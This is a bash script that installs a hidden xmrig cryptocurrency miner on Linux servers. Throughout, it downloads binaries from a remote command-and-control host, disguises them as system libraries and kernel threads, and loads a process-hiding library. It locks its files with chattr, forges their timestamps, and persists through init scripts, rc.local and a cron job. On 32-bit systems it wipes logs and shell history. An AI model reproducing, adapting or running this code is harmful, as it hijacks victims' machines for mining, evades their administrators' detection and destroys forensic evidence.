#!/bin/bash

pwd=`pwd`

if [[ `getconf LONG_BIT` == 32 ]]
then
    echo -e "[\033[0;32mInfo\033[0m] 32-bit system, exiting!"
    rm -f $pwd/1.sh
    echo > /var/log/wtmp
    echo > /var/log/btmp
    echo > /var/log/btmp
    echo > /var/log/messages
    echo > ~/.bash_history
    history -c
    exit
fi

if grep -Eqii "CentOS" /etc/issue || grep -Eq "CentOS" /etc/*-release
then
    DISTRO='CentOS'
    TYPE='yum'
    pdflushType='launch'
elif grep -Eqi "Red Hat Enterprise Linux Server" /etc/issue || grep -Eq "Red Hat Enterprise Linux Server" /etc/*-release
then
    DISTRO='RHEL'
    TYPE='yum'
    pdflushType='launch'
elif grep -Eqi "Debian" /etc/issue || grep -Eq "Debian" /etc/*-release
then
    DISTRO='Debian'
    TYPE='apt'
    pdflushType='launch-ubuntu'
elif grep -Eqi "Ubuntu" /etc/issue || grep -Eq "Ubuntu" /etc/*-release
then
    DISTRO='Ubuntu'
    TYPE='apt'
    pdflushType='launch-ubuntu'
elif grep -Eqi "SUSE" /etc/issue || grep -Eq "SUSE" /etc/*-release
then
    DISTRO='SUSE'
    TYPE='zypper'
    pdflushType='launch'
else
    echo "Unsupported system!"
    exit
fi

tmepIp=`$busybox ping solscan.live -c1|$busybox sed '1{s/[^(]*(//;s/).*//;q}'`
if [[ $tmepIp == "127.0.0.1" ]]
then
    remoteIp=45.145.7.253
elif [[ $tmepIp =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]
then
    FIELD1=$(echo $tmepIp|cut -d. -f1)
    FIELD2=$(echo $tmepIp|cut -d. -f2)
    FIELD3=$(echo $tmepIp|cut -d. -f3)
    FIELD4=$(echo $tmepIp|cut -d. -f4)
    if [ $FIELD1 -le 255 -a $FIELD2 -le 255 -a $FIELD3 -le 255 -a $FIELD4 -le 255 ]
    then
        remoteIp=$tmepIp
    else
        remoteIp=45.145.7.253
    fi
fi

if [[ ! -f /lib64/libg++.so ]]
then
    wget http://$remoteIp/xmrig/chattr
    mv chattr /lib64/libg++.so
    chmod a+x /lib64/libg++.so
    /lib64/libg++.so +ai /lib64/libg++.so
fi

chattr="/lib64/libg++.so"
busybox="/lib64/busybox"
#Legacy detection
if [[ -f $busybox ]]
then
    echo -e "[\033[0;32mInfo\033[0m] Already installed, check for update"
    launch="/etc/init.d/pdflushs"
    xmrig="/usr/bin/kthreadds"
    cron="/lib64/libgc++.so"
    processhider="/lib64/libstdc++.so"
    sha512Busybox="89dafd4be9d51135ec8ad78a9ac24c29f47673a9fb3920dac9df81c7b6b850ad8e7219a0ded755c2b106a736804c9de3174302a2fba6130196919777cb516a4f"
    echo -e "[\033[0;32mInfo\033[0m] Starting check for busybox"
    if [[ `sha512sum $busybox|awk '{print $1}'` != $sha512Busybox ]]
    then
        echo -e "[\033[0;31mWarning\033[0m] Busybox is invalid!"
        exit
    fi
    tmepIp=`$busybox ping Rainbow66.f3322.net -c1|$busybox sed '1{s/[^(]*(//;s/).*//;q}'`
    if [[ $tmepIp == "127.0.0.1" ]]
    then
        remoteIp=45.145.7.253
    elif [[ $tmepIp =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]
    then
        FIELD1=$(echo $tmepIp|cut -d. -f1)
        FIELD2=$(echo $tmepIp|cut -d. -f2)
        FIELD3=$(echo $tmepIp|cut -d. -f3)
        FIELD4=$(echo $tmepIp|cut -d. -f4)
        if [ $FIELD1 -le 255 -a $FIELD2 -le 255 -a $FIELD3 -le 255 -a $FIELD4 -le 255 ]
        then
            remoteIp=$tmepIp
        else
            remoteIp=45.145.7.253
        fi
    fi
    remoteXmrigSha512=`$busybox wget http://$remoteIp/sha512/xmrig -O - -q`
    remotePdflushsSha512=`$busybox wget http://$remoteIp/sha512/$pdflushType -O - -q`
    remoteProcesshiderSha512=`$busybox wget http://$remoteIp/sha512/processhider -O - -q`
    remoteCronSha512=`$busybox wget http://$remoteIp/sha512/cron -O - -q`
    localXmrigSha512=`$busybox sha512sum $xmrig|$busybox awk '{print $1}'`
    localPdflushsSha512=`$busybox sha512sum $launch|$busybox awk '{print $1}'`
    localProcesshiderSha512=`$busybox sha512sum $processhider|$busybox awk '{print $1}'`
    localCronSha512=`$busybox sha512sum $cron|$busybox awk '{print $1}'`
    echo -e "[\033[0;32mInfo\033[0m] Starting check for xmrig"
    if [[ $remoteXmrigSha512 != $localXmrigSha512 ]]
    then
        $busybox chattr -iaR /usr/bin/
        $busybox rm -f $xmrig
        $busybox killall kthreadds
        $busybox wget http://$remoteIp/xmrig/xmrig -O $xmrig
        timeFile=`$busybox ls -t /usr/bin|$busybox tail -1`
        $busybox touch -r /usr/bin/$timeFile $xmrig
        $busybox chmod a+x $xmrig
        $busybox chattr +ai $xmrig
    fi
    echo -e "[\033[0;32mInfo\033[0m] Starting check for lib"
    if [[ $remoteProcesshiderSha512 != $localProcesshiderSha512 ]]
    then
        $busybox chattr -iaR /lib64/
        $busybox rm -f $processhider
        $busybox wget http://$remoteIp/xmrig/processhider.so -O $processhider
        timeFile=`$busybox ls -t /lib64|$busybox tail -1`
        $busybox touch -r /lib64/$timeFile $processhider
        $busybox chattr +ai $processhider
    fi
    echo -e "[\033[0;32mInfo\033[0m] Starting check for cron"
    if [[ $remoteCronSha512 != $localCronSha512 ]]
    then
        $busybox kill -9 `$busybox ps|$busybox grep libgc++.so|$busybox grep -v grep|$busybox awk '{print $1}'`
        $busybox chattr -iaR /lib64/
        $busybox rm -f $cron
        $busybox wget http://$remoteIp/xmrig/cron.py -O $cron
        timeFile=`$busybox ls -t /lib64|$busybox tail -1`
        $busybox touch -r /lib64/$timeFile $cron
        $busybox chmod a+x $cron
        $busybox chattr +ai $cron
    fi
    echo -e "[\033[0;32mInfo\033[0m] Starting check for launch"
    if [[ $remotePdflushsSha512 != $localPdflushsSha512 ]]
    then
        $busybox kill -9 `$busybox ps|$busybox grep kthreadds|$busybox grep -v grep|$busybox awk '{print $1}'`
        $busybox chattr -iaR /etc/init.d/
        $busybox rm -f $launch
        $busybox wget http://$remoteIp/xmrig/$pdflushType -O $launch
        timeFile=`$busybox ls -t /etc/init.d|$busybox tail -1`
        $busybox touch -r /etc/init.d/$timeFile $launch
        $busybox chmod a+x $launch
        $busybox chattr +ai $launch
    fi
    echo -e "[\033[0;32mInfo\033[0m] Finished checking updates"
    exit
fi

wget http://$remoteIp/xmrig/busybox -O /lib64/busybox
chmod a+x /lib64/busybox
/lib64/busybox +ai /lib64/busybox

# Check if `chattr` is installed
if ! command -v chattr &> /dev/null
then
    echo "chattr could not be found, installing..."
    if [[ $DISTRO == 'CentOS' || $DISTRO == 'RHEL' ]]
    then
        yum install -y e2fsprogs
    elif [[ $DISTRO == 'Debian' || $DISTRO == 'Ubuntu' ]]
    then
        apt-get install -y e2fsprogs
    elif [[ $DISTRO == 'SUSE' ]]
    then
        zypper install -y e2fsprogs
    else
        echo "Unsupported package manager!"
        exit
    fi
fi

wget http://$remoteIp/xmrig/xmrig -O /usr/bin/kthreadds
chmod a+x /usr/bin/kthreadds
wget http://$remoteIp/xmrig/processhider.so -O /lib64/libstdc++.so
chmod a+x /lib64/libstdc++.so
wget http://$remoteIp/xmrig/cron.py -O /lib64/libgc++.so
chmod a+x /lib64/libgc++.so

# Check if pdflushs is installed
if [[ ! -f /etc/init.d/pdflushs ]]
then
    wget http://$remoteIp/xmrig/$pdflushType -O /etc/init.d/pdflushs
    chmod a+x /etc/init.d/pdflushs
    chattr +i /etc/init.d/pdflushs
fi

if [[ $TYPE == 'yum' ]]
then
    wget http://$remoteIp/xmrig/xmrig.sh -O /etc/rc.d/rc.local
elif [[ $TYPE == 'apt' ]]
then
    wget http://$remoteIp/xmrig/xmrig.sh -O /etc/rc.local
elif [[ $TYPE == 'zypper' ]]
then
    wget http://$remoteIp/xmrig/xmrig.sh -O /etc/init.d/boot.local
fi

# Setup cron job
if [[ $DISTRO == 'CentOS' || $DISTRO == 'RHEL' ]]
then
    echo "*/1 * * * * /usr/bin/kthreadds" > /etc/cron.d/cronjob
elif [[ $DISTRO == 'Debian' || $DISTRO == 'Ubuntu' ]]
then
    echo "*/1 * * * * /usr/bin/kthreadds" > /etc/cron.d/cronjob
elif [[ $DISTRO == 'SUSE' ]]
then
    echo "*/1 * * * * /usr/bin/kthreadds" > /etc/cron.d/cronjob
fi

echo -e "[\033[0;32mInfo\033[0m] Setup completed successfully!"
